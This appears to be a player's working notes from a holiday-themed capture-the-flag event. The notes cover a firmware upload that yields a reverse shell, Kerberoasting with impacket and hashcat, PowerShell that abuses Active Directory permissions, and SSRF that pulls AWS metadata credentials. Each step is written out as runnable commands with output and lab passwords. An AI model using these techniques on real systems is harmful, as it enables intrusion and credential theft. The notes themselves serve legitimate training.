{"firmware":"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","signature":"8c2ceeaef2c299220dc459688c62c35b45d13667921a5027e3f5a69613f8ac01","secret_length":16,"algorithm":"SHA256"}

root@web:~# nc -lvp 9191
Listening on [0.0.0.0] (family 0, port 9191)
Connection from 20.219.121.34.bc.googleusercontent.com 46082 received!
whoami
app
cat /var/spool/printer.log
Documents queued for printing
=============================

Biggering.pdf
Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
LowEarthOrbitFreqUsage.txt
Best Winter Songs Ever List.doc
Win People and Influence Friends.pdf
Q4 Game Floor Earnings.xlsx
Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
Troll_Pay_Chart.xlsx



Challenge: Kerberoasting on an Open Fire

easily my favorite challenge and the most difficult

ElfU Registration Portal
New Student Domain Account Creation Successful!
You can now access the student network grading system by SSH'ing into this asset using the command below:
ssh hkcyypxgme@grades.elfu.org -p 2222
ElfU Domain Username: hkcyypxgme
ElfU Domain Password: Unojcjijx!

once you ssh go ahead and clt+d to turn python back a bit...

spawn a shell
'import pty; pty.spawn("/bin/bash")'

change shell so you can scp files over if you want
chsh -s /bin/bash

nmaped local stuff... also did ps aux / arp -a && saw a few other interesting hosts dont think i captured all of them in nmaps

Nmap scan report for 172.17.0.1
Host is up (0.00073s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap scan report for grades.elfu.local (172.17.0.2)
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.3
Host is up (0.00020s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
42/tcp   open  nameserver
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap scan report for 172.17.0.4
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 172.17.0.5
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

I never ended up using sharphound
scp -P 2222 SharpHound.ps1 hkcyypxgme@grades.elfu.org:/home/hkcyypxgme                                                                                                                              1 ⨯

i did snag this https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py

python3 smbclient.py 'elfu.local/hkcyypxgme:Unojcjijx!@10.128.1.53'


fcghzadjfl@grades:~$ python3 GetUserSPN.py elfu.local/suxekitihx:Yqygyshmr@ -dc-ip 10.128.1.53 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon                   Delegation 
-----------------------------------  --------  --------  --------------------------  --------------------------  ----------
ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             
ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  2022-01-01 22:22:20.256267             



$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$6f3c07f2b354aed9e974fb85885cb0ed$d4eaa7d0cc3c8463eb5a5f68d7955afedeb713c8ade9a197447e721769657b34ea4b715a89475ad267664dc59dec0cdf9f5076ebc962d116c6a84081b3d716995ccebb7c6bdeebf228baa6aff634c42adb53b31e17f6e3cdc1f55d3b1ef33e6f33b8c68df83cc6281032cb3db3f0b82f57da9864082850d5c1d886648164b69167b2bff55c5a24b5aac153176e8627c1cdb69cfdee977419b92cfdbe589d64c802396402898e4da247275cd9829821d58f21b53b3d4f381c2fc2090fc1515ea3e08762c76e18fbdd17dc38a4f1d257b268c2786bd142cbee6f9a437f89ac9bacefac4e96615c15193d89315c7f74e1e4d26acfda31c638f799d55a5c327760f0f1e40b365012aa6c1b5ad1ad770f6e7c7e121fb1c27ccc95f1b1fe99cd0240175fa0d21f82e72574370b16871dafe4a18eb786645ca9c680b7ea3af6ba82e3d422dc1f727733953846721e22b0ee63f5ba7586bd344977779fa21d9dd1e3f5542cdc4eabefa73e0d899c98f6665bd23794494394850b3a8bed815a80d7d50b0fc2b17b7d5c99dd4d07d83749d174fd4ba0f305f0e30b424a85f249c2a4da083aa60c13ca90646059a4964db25947d160b2db4fa5eaabc963168a5ed7fb115d94da56953566fc7c3a532034b06607a5df805f6001c9603f429941aa9735299e76749638e4ce918deeda9be55fc316940f334630e0e0413d086ca4d974ba306da7483a50c9cfa199e2703b40226d7b74ec2c2e92f54db2e3b00ef63b804e9870f1c19f0b27da724a1986536bed5ae4680d0fac2fbe43c0f8a4da66e11601a875592477809c9c5790ca502c3b179d2e2717fc5b55c55c161c86970b3ade3b6adc6c6d7de819140071e41e6321ad0b8c744a3ee4ea26d2c9b118ec8692758bde887124afb6b8f95d594cf430a61aa0864fbd8e4945d5433feb8935fe3ff8aa1461766d5a7287a125c04ec9adb55d6cd155900134d565688d0e2f28ccaeeaa8723c093b919ad0caf4f1f4d606dd1716bab385e7edf0f357f6afacad1c0b2b2ad2ff5b51575c8ad0751a831b852cf3fc1c939dde4868ca4b92bdee652c03fbdd314a30a7922b51fbd913b54a5341a18e72c86b680a0913ef40e77902757c9256337007d60ffc710406884c1b946a9b7c845d1b04832ff2853f5a472978b807e81d9d6742ffcb3b6cce8aea9f8dd6a041de81b83916181a6c009560759cb7dd8024bf57f701690e8431d89f9824afe62972f58be97185e60c531df9948b5b3f0f12421c99693c01b04cc1c02626ef46b4d99de7ac5a42742a374cc203e52e40a80e4b9b5cced00307ca2f43fa329c6db6b61a177ef191f2fe68ce91438dd5c69bfbcd5e421d721fc429436917ba7cc5a19919cc062c980828edbb040f499adf76fa8c65bb5718515d4f7f1f0263421cd2d349aa6e5b40dc192d9a4a49f2f1c699cdbc2f4d457d0c38

on the website this comment existed for cracking the password, use the tool from the hints which removed numbers 
register.elfu.org -
<!-- Remember the groups battling to win the karaoke contest earleir this year? I think they were rocks4socks, cookiepella, asnow2021, 
            v0calprezents, Hexatonics, and reindeers4fears. Wow, good times! -->

were
rocks
socks
cookiepella
asnow
calprezents
Hexatonics
reindeers
fears
Wow
good
times
rocks4socks
cookiepella
snow2021
v0calprezents
Hexatonics
reindeers4fears
rockssocks
cookiepella
asnow
vcalprezents
Hexatonics
reindeersfears

decided to remove digits like the WeCL script and add to wordlist
└─$ hashcat -m 13100 -a 0 ./captured.txt --potfile-disable -r ./password_cracking_rules/OneRuleToRuleThemAll.rule --force -O -w 4 --opencl-device-types 1,2 wordlist.txt

$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$a0e75cf96d8b60dddcd6d91e08e063e7$d4c3a561978d99d9e6218f5746ad511466bfd41fcf991375adec11147311320144ed8166beac3de02e7dda18cb00478d38d0090266fb5455d55a613efde194a6993fcefe61e0e6fc2045878f1a4d9ac21164cd07bbececb1f1b075e7ee4832c2f6c70fe28bf9e6cc6e135e29e6b5608bdc03649e6975199eb83fc7e29fa68aff9150a3ef104204cf508645d5a2cf200489d14cfe9be300df2ca08a2257b95d3efff4be2c6568a196d9eeefe99aa2dc7028770f5e31b229e1c7986dee327f3ed19e06f63b14708d2d501c21aed6b92968fd70dc881ce46903f0eb032aa3c846b3385437c20b6fc031f6488c261e8b6f7e23e99aa95c3053036469cb7222527dcbb1b759d1be717ff21b8b3f843241d661be86c1c34826b4e7dd7dcd859971d160da35cbe79470da8664ce671096fee216e9b7232f4eca1c38f8e4a0a7031f9b8422257a451eaa3a6c06ab222d802e1d49e31ef2ea5b671465403134d2f58840f770049603e05a6e8e2962ce4327b57d67509681c4bbf2f4cb30ef93c1cbbaa19540ffaf6e70df3b831bb285bd9d249af64bcbe525aadeb4d252880ae3ad7a2e7d2063f5df91fefd52f3b0a49a5d4078df5976e19f58e2b2aa1bde3d91f077320889fcedfa7be8764d9d9e9a397d6c7d4e586315fb7c91587e0da7df67aba7bdb5aa5fa47a9ffe1995406537e80a0555c83d996810a9b5b4d78c80d481fc4cd1e1feb16321a56822e852186f13246704af73a72a63474bf491ab98dd051f239a6212be22957fa71834f9ed0f6ad260f6c764d287c3db1c053b8adc9fe5d9819ee55a1c17886f8ea51a93c171afe673bea4643ba4825d0216f9b0f1436a6c060be0caa303b1eb4af167395d84a63ba1aa2c4fe6f49a1bec722b29721dbe879db6b6369855833d187ba865937dce6c2ff97c67dfea3a8c5486859f04757e60bbd084aa3844c8bbf971c97a428c9a4f9c795cb4881e539b7e1bf6fa37b92cd3f1c5060864dc6821807da1144cebdfac9cc5954bfc22a7ae575ea9b20d2c00b250f2fb651b37a715b95dfb270532ec69bca85626c91abc4a3fab9631601412dc98b6b16e8e1edead285a1e723d6b60944d8c813872d25a281bdc4a588fa07185cf98078e6683cac8ae7643f8c0d0faa513483464763990bccf158b0966873c3bb9a52ff9b30323fc8a07c6503a1de160d17d62094fb426582313ca74ec0e3de0dfb771204f2fc9206f3ae120df7b9db4d46745dd2efd9fc0ef15959d23750b9ec8a7392635277e2250a8eead71dcf98e2ebb5378e52d3b028c2d66a5602f9a25a342863175558259711065905659515331af3bae1fadb047fdd0afffd2172b1b189fea9f21a2e5787c81366da9330f05648ba51791900f4a681e09ab8d240c201010ffbc86c9888cb8d09cf1f6d4d22d66f875f43f6e5e8d172cda37d59deea2354f713b862a1e9a:Snow2021!
                                                       
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_sv...2a1e9a
Time.Started.....: Sun Jan  2 14:32:56 2022, (2 secs)
Time.Estimated...: Sun Jan  2 14:32:58 2022, (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (wordlist.txt)
Guess.Mod........: Rules (./password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2041.3 kH/s (10.71ms) @ Accel:256 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3663360/4679550 (78.28%)
Rejected.........: 0/3663360 (0.00%)
Restore.Point....: 0/90 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:40448-40704 Iteration:0-256
Candidate.Engine.: Device Generator
Candidates.#1....: The0307 -> ceindeersfears
Hardware.Mon.#1..: Util: 91%

Started: Sun Jan  2 14:32:55 2022
Stopped: Sun Jan  2 14:33:00 2022


Snow2021!


$password = ConvertTo-SecureString "Snow2021!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\elfu_svc", $password)
Enter-PSSession -ComputerName 10.128.3.30 -Credential $creds -Authentication Negotiate

use smbclient.py to download the ps1 files, looked inside GetProcessInfo

cat GetProcessInfo.ps1 
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate


once you connect to the PS Session - ls shows you this interesting file

-a----         1/3/2022   1:49 PM           6331 adGroupList.csv 

we see at the bottom the AD group "researchdepartment" huh...

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])

$ldapConnString = "LDAP://CN=ResearchDepartment,CN=Users,DC=elfu,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$domainDirEntry.get_ObjectSecurity().Access


Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "hkcyypxgme"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "hkcyypxgme"
$password = "Unojcjijx!"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

smbclient 172.17.0.3 
open
login
get SantaSecretToAWonderfulHolidaySeason.pdf

scp -P 2222 hkcyypxgme@grades.elfu.org:/home/hkcyypxgme/SantaSecretToAWonderfulHolidaySeason.pdf .


open pdf word was `kindness`



Splunk Challenges


task 1 + 2 search criteria - `User=eddie git partnerapi`
git status
git@github.com:elfnp3/partnerapi.git
task 3 search - User=eddie docker
docker compose up
task -4 
https://github.com/snoopysecurity/dvws-node
task -5
holiday-utils-js
task -6
/usr/bin/nc.openbsd
task -7 (found the cat of all the files)
6 (cat /home/eddie/.aws/credentials /home/eddie/.ssh/authorized_keys /home/eddie/.ssh/config /home/eddie/.ssh/eddie /home/eddie/.ssh/eddie.pub /home/eddie/.ssh/known_hosts)
task - 8 (can look around the event)
preinstall.sh



Challenge: Now hiring!

Noticed we could SSRF in the inputWorkSample field, and it stored the stuff in the inputName field. Turns out you could inspect in browser but I just wget’d and looked at the file

GET /?inputName=sillymemerfun&inputEmail=b@b.com&inputPhone=555-555-5555&inputField=Crayon+on+walls&resumeFile=alabaster_badge.pdf&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&additionalInformation=t&submit= HTTP/1.1
Host: apply.jackfrosttower.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://169.0376.169.254/latest/meta-data
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Content-Length: 0
X-aws-ec2-metadata-token-ttl-seconds: 21600


➜  Desktop wget https://apply.jackfrosttower.com/images/sillymemerfun.jpg
--2022-01-04 20:27:56--  https://apply.jackfrosttower.com/images/sillymemerfun.jpg
Resolving apply.jackfrosttower.com (apply.jackfrosttower.com)... 34.117.109.159
Connecting to apply.jackfrosttower.com (apply.jackfrosttower.com)|34.117.109.159|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 308 [image/jpeg]
Saving to: ‘sillymemerfun.jpg’

sillymemerfun.jpg                   100%[================================================================>]     308  --.-KB/s    in 0s

2022-01-04 20:27:56 (147 MB/s) - ‘sillymemerfun.jpg’ saved [308/308]

➜  Desktop vim sillymemerfun.jpg
{
        "Code": "Success",
        "LastUpdated": "2021-05-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-05-02T18:50:40Z"



Challenge: Customer Complaint Analysis

Answer is: Flud Hagg Yaqh


Frame 384: 1025 bytes on wire (8200 bits), 1025 bytes captured (8200 bits)
Ethernet II, Src: Dell_14:9e:21 (00:12:3f:14:9e:21), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.251, Dst: 10.70.84.10
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
Total Length: 1011
Identification: 0xeb70 (60272)
Flags: 0x40, Don't fragment
Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x8e03 [validation disabled]
[Header checksum status: Unverified]
Source Address: 10.70.84.251
Destination Address: 10.70.84.10
Transmission Control Protocol, Src Port: 36676, Dst Port: 80, Seq: 1, Ack: 1, Len: 959
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Muffy VonDuchess Sebastian"
Key: name
Value: Muffy VonDuchess Sebastian
Form item: "troll_id" = "I don't know. There were several of them."
Key: troll_id
Value: I don't know. There were several of them.
Form item: "guest_info" = "Room 1024"
Key: guest_info
Value: Room 1024
Form item: "description" = "I have never, in my life, been in a facility with such a horrible staff. They are rude and insulting. What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!"
Key: description
Value: I have never, in my life, been in a facility with such a horrible staff. They are rude and insulting. What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 348: 883 bytes on wire (7064 bits), 883 bytes captured (7064 bits)
Ethernet II, Src: NorthPol_28:2d (90:4e:91:20:28:2d), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.106, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 40630, Dst Port: 80, Seq: 1, Ack: 1, Len: 817
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Hagg"
Key: name
Value: Hagg
Form item: "troll_id" = "2013"
Key: troll_id
Value: 2013
Form item: "guest_info" = "Incredibly angry lady in room 1024"
Key: guest_info
Value: Incredibly angry lady in room 1024
Form item: "description" = "Lady call front desk. I am walk by so I pick up phone. She is ANGRY and shout at me. Say she has never been so insult. I say she probably has but just didn't hear it."
Key: description
Value: Lady call front desk. I am walk by so I pick up phone. She is ANGRY and shout at me. Say she has never been so insult. I say she probably has but just didn't hear it.
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 312: 911 bytes on wire (7288 bits), 911 bytes captured (7288 bits)
Ethernet II, Src: NorthPol_1f:3c (90:4e:91:20:1f:3c), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.164, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 33342, Dst Port: 80, Seq: 1, Ack: 1, Len: 845
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Flud"
Key: name
Value: Flud
Form item: "troll_id" = "2083"
Key: troll_id
Value: 2083
Form item: "guest_info" = "Very cranky lady in room 1024"
Key: guest_info
Value: Very cranky lady in room 1024
Form item: "description" = "Lady call front desk. Complain "employee" is rude. Say she is insult and want to speak to manager. Send Flud to room. Lady say troll call her towels thief. I say stop steal towels if is bother her."
Key: description
Value: Lady call front desk. Complain "employee" is rude. Say she is insult and want to speak to manager. Send Flud to room. Lady say troll call her towels thief. I say stop steal towels if is bother her.
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 276: 882 bytes on wire (7056 bits), 882 bytes captured (7056 bits)
Ethernet II, Src: NorthPol_2a:56 (90:4e:91:20:2a:56), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.38, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 35796, Dst Port: 80, Seq: 1, Ack: 1, Len: 816
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Yaqh"
Key: name
Value: Yaqh
Form item: "troll_id" = "2796"
Key: troll_id
Value: 2796
Form item: "guest_info" = "Snooty lady in room 1024"
Key: guest_info
Value: Snooty lady in room 1024
Form item: "description" = "Lady call desk and ask for more towel. Yaqh take to room. Yaqh ask if she want more towel because she is like to steal. She say Yaqh is insult. Yaqh is not insult. Yaqh is Yaqh."
Key: description
Value: Lady call desk and ask for more towel. Yaqh take to room. Yaqh ask if she want more towel because she is like to steal. She say Yaqh is insult. Yaqh is not insult. Yaqh is Yaqh.
Form item: "submit" = "Submit"
Key: submit
Value: Submit



Challenge: Frost Tower Website Checkup

I got nerd sniped on thsi challenge and struggled for a bit before things finally clicked. Asked for help on the discord and worked with @xstevens quite a bit.


auth bypass 
app.post('/postcontact', function(req, res, next){
    var fullname = xss( ReplaceAnyMatchingWords(req.body.fullname) );
    var email = xss( ReplaceAnyMatchingWords( req.body.email) );
    var phone = xss( ReplaceAnyMatchingWords( req.body.phone) );
    var country = xss( ReplaceAnyMatchingWords( req.body.country ) );
    var date = new Date();
    var d = date.getDate();
    var mo = date.getMonth();
